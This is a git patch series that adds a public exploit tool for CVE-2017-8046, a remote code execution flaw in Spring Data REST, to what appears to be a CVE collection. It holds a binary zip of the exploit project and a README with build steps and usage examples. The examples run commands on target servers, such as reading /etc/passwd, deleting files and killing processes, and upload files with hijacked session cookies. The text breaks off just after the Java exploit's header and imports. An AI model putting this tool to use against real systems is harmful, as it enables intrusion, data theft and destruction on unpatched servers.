From 4746f6374b9a015b4f9221aeec7c56a033f676f8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:53:44 +0000 Subject: [PATCH 01/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 474bbce43c3e49cdb7b3387dc7e6d18037f2f244 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:54:28 +0000 Subject: [PATCH 02/13] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2017-8046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/CVE-2017-8046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7039547d3b23e13e89f9c2f7d0b448cbb246b615 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:56:14 +0000 Subject: [PATCH 03/13] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- .../spring-break_cve-2017-8046-master.zip | Bin 0 -> 12833 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip 
diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip new file mode 100644 index 0000000000000000000000000000000000000000..078e924350cf580703b34d31477354a894198a3b GIT binary patch literal 12833 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 Date: Mon, 10 Apr 2023 10:57:06 +0000 Subject: [PATCH 04/13] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/CVE-2017-8046/.gitignore | 60 ++ .../2017/CVE-2017-8046/LICENSE.txt | 13 + cve/java-spring/2017/CVE-2017-8046/README.md | 163 +++++ .../CVE-2017-8046/SpringBreakCve20178046.java | 651 ++++++++++++++++++ cve/java-spring/2017/CVE-2017-8046/pom.xml | 68 ++ 5 files changed, 955 insertions(+) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.gitignore create mode 100644 cve/java-spring/2017/CVE-2017-8046/LICENSE.txt create mode 100644 cve/java-spring/2017/CVE-2017-8046/README.md create mode 100644 cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java create mode 100644 cve/java-spring/2017/CVE-2017-8046/pom.xml diff --git a/cve/java-spring/2017/CVE-2017-8046/.gitignore b/cve/java-spring/2017/CVE-2017-8046/.gitignore new file mode 100644 index 00000000..6dc7e51e --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/.gitignore 
@@ -0,0 +1,60 @@
+###################
+# Compiled source #
+###################
+*.com
+*.dll
+*.exe
+*.o
+*.so
+*.bat
+
+############
+# Packages #
+############
+# it's better to unpack these files and commit the raw source
+# git has its own built in compression methods
+*.7z
+*.dmg
+*.gz
+*.iso
+*.rar
+*.tar
+*.zip
+
+######################
+# Logs and databases #
+######################
+*.log
+*.sqlite
+
+######################
+# OS generated files #
+######################
+.DS_Store*
+ehthumbs.db
+Icon?
+Thumbs.db
+*~
+
+######################
+# Other repositories #
+######################
+.svn
+.\#*
+
+####################
+# Java programming #
+####################
+build
+doc
+generated
+target
+.project
+.classpath
+.settings
+*.class
+*.jar
+*.war
+*.ear
+junit*.properties
+/bin/
diff --git a/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
new file mode 100644
index 00000000..92904254
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
@@ -0,0 +1,13 @@
+Copyright 2018 Antonio Francesco Sardella
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
\ No newline at end of file
diff --git a/cve/java-spring/2017/CVE-2017-8046/README.md b/cve/java-spring/2017/CVE-2017-8046/README.md
new file mode 100644
index 00000000..60caa5e0
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/README.md
@@ -0,0 +1,163 @@
+# spring-break_cve-2017-8046
+
+This is a Java program that exploits **Spring Break** vulnerability (**CVE-2017-8046**).
+
+This software is written to have as less external dependencies as possible.
+
+## DISCLAIMER
+
+**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**
+
+## Vulnerability info
+
+* **CVE-ID**: CVE-2017-8046
+* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046)
+* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code.
+* **Vendor link**: [https://pivotal.io/security/cve-2017-8046](https://pivotal.io/security/cve-2017-8046)
+
+## How to generate an executable JAR
+
+Here some steps to follow in order to generate an executable JAR, with all dependencies into it, that can be used to launch the exploit.
+
+### with Maven
+
+Following Maven command can be launched:
+
+```
+mvn clean compile package
+```
+
+### with Eclipse
+
+Following steps can be done:
+1. solve all external dependencies/libraries;
+1. right click on the Eclipse project and go to `Run As > Run Configurations`;
+1. right click on `Java Application` then on `New`;
+1. choose a name and set the main class to `com.afs.exploit.spring.SpringBreakCve20178046`;
+1. click on `Apply` button;
+1. close the window and go back to the main Eclipse window;
+1. right click on the Eclipse project and click on `Export...`;
+1. find and choose `Runnable JAR file` (under `Java` branch);
+1. in the following window:
+ 1. choose the correct `Launch configuration` created before;
+ 1. choose an `Export destination`;
+ 1. choose the option `Extract required libraries into generated JAR`;
+ 1. click on `Finish` button.
+
+## Help
+
+```
+Usage:
+ java -jar spring-break_cve-2017-8046.jar [options]
+Description:
+ Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).
+Options:
+ -h, --help
+ Prints this help and exits.
+ -u, --url [target_URL]
+ The target URL where the exploit will be performed.
+ You have to choose an existent resource.
+ -cmd, --command [command_to_execute]
+ The command that will be executed on the remote machine.
+ -U, --upload [file_to_upload]
+ File to upload to the remote machine. Will be uploaded to the current working
+ directory of the java process. Warning: this will only succeed on a server running
+ JRE-1.7 or later.
+ --remote-upload-directory [/some/existing/path/]
+ Optional. Server will attempt to write the uploaded file to this directory on the
+ filesystem. Specified directory must exist and be writeable.
+ --cookies [cookies]
+ Optional. Cookies passed into the request, e.g. authentication cookies.
+ -H, --header [custom_header]
+ Optional. Custom header passed into the request, e.g. authorization header.
+ -k
+ Skip SSL validation
+ --clean
+ Optional. Removes error messages in output due to the usage of the
+ exploit. It could hide error messages if the request fails for other reasons.
+ --error-stream
+ Optional. In case of errors the command will fail and the error stream will
+ not be returned. This option can be used to relaunch the remote command
+ returning the error stream.
+ -v, --verbose
+ Optional. Increase verbosity.
+```
+
+
+## Examples
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean
+```
+
+Please note that the referenced resource/URL must exist!
+
+## Vulnerable application
+
+A vulnerable application can be found [here](https://github.com/m3ssap0/SpringBreakVulnerableApp).
+
+## Authors
+
+* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0)
+* **Yassine Tioual** - *HTTP header enhancement* - [nisay759](https://github.com/nisay759)
+* **Robin Wagenaar** - *for the suggestion to use patch operation 'remove' instead of 'replace' and for the file upload functionality* - [RobinWagenaar](https://github.com/RobinWagenaar)
+
+## License
+
+This project is licensed under the Apache License Version 2.0 - see the **LICENSE.txt** file for details.
+
+## Acknowledgments
+
+* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability
\ No newline at end of file
diff --git a/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java
new file mode 100644
index 00000000..7488b58c
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java
@@ -0,0 +1,651 @@
+// Exploit Title: RCE in PATCH requests in Spring Data REST
+// Date: 2018-03-10
+// Exploit Author: Antonio Francesco Sardella
+// Vendor Homepage: https://pivotal.io/
+// Software Link: https://projects.spring.io/spring-data-rest/
+// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)
+// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE'
+// CVE: CVE-2017-8046
+// Category: Webapps
+// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046
+// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp
+// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com
+
+package com.afs.exploit.spring;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.net.URI;
+import java.net.URISyntaxException;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.commons.codec.binary.Base64;
+import org.apache.commons.io.FileUtils;
+import org.apache.http.HttpResponse;
+import org.apache.http.client.HttpClient;
+import org.apache.http.client.methods.HttpPatch;
+import org.apache.http.entity.StringEntity;
+import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.ssl.SSLContextBuilder;
+import org.apache.http.conn.ssl.TrustSelfSignedStrategy;
+import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
+import org.apache.http.conn.ssl.NoopHostnameVerifier;
+
+/**
+ * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).
+ * This software is written to have as less external dependencies as possible.
+ * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please
+ * use this tool responsibly. I do not take responsibility for the way in which any one uses this application.
+ * I am NOT responsible for any damages caused or any crimes committed by using this tool.
+ * ..................
+ * . CVE-ID ........: CVE-2017-8046
+ * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
+ * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST
+ * .................. versions prior to 2.5.12, 2.6.9, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring
+ * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary
+ * .................. Java code.
+ * ..................
+ *
+ * @author Antonio Francesco Sardella
+ */
+public class SpringBreakCve20178046 {
+
+ /**
+ * Version string.
+ */
+ private static final String VERSION = "v1.6 (2018-10-13)";
+
+ /**
+ * The JSON Patch object.
+ */
